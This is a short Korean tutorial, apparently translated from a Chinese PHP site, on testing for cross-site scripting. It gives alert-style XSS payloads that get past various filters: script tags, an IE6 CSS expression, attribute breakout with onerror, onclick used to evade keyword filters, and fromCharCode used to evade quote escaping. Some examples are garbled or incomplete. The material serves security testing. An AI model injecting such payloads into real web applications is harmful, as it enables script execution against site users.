xss의 소규모 테스트는 어떻게 수행됩니까?

• 보안 제한 없음, 직접 사용

<script>alert(/xss/);</script>

• 제한 사항: CSS만 사용할 수 있으며 html 태그는 허용되지 않습니다

Expression을 사용하여 XSS를 구성할 수 있다는 것을 알고 있지만 IE에서만 테스트할 수 있으므로 IE6에서 다음 테스트를 수행하세요.

body {
black;
xss:alert(/xss/));/*IE6下测试*/
}

• 제한사항: HTML은 이스케이프 처리되며 이미지 태그는 사용 가능.

테스트에 입력된 문자는 src 주소에 삽입되므로 의사 프로토콜을 사용하여 이를 우회할 수 있습니다.

직접 입력

alert( /xss/);

또는 이벤트를 사용하여 우회할 수도 있습니다. 다음과 같이 종료문에 주의하세요.

1" onerror=alert(/xss/); var a="1

• 제한사항: 키워드 필터링이 사용됩니다.

테스트했는데 대부분 필터링되었으며 일부는 필터링되지 않았습니다. 테스트 후 스크립트/onerror는 필터링되었지만 onclick은 필터링되지 않았습니다. onclick 이벤트를 사용하여

<img src=# onclick=alert(/xss/);>

• 제한 사항: 기능에 추가 래시를 사용하세요. 문자는 이스케이프 처리됩니다

. 이는 작은따옴표, 큰따옴표 및 기타 특성 문자가 XSS 문에 나타날 수 없음을 의미합니다.

<script>alert(/xss/);</script>

를 직접 사용하여

를 우회하거나 다음과 같이 String.fromCharCode 메서드를 사용하세요.

<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>

위 내용은 xss의 소규모 테스트는 어떻게 수행됩니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!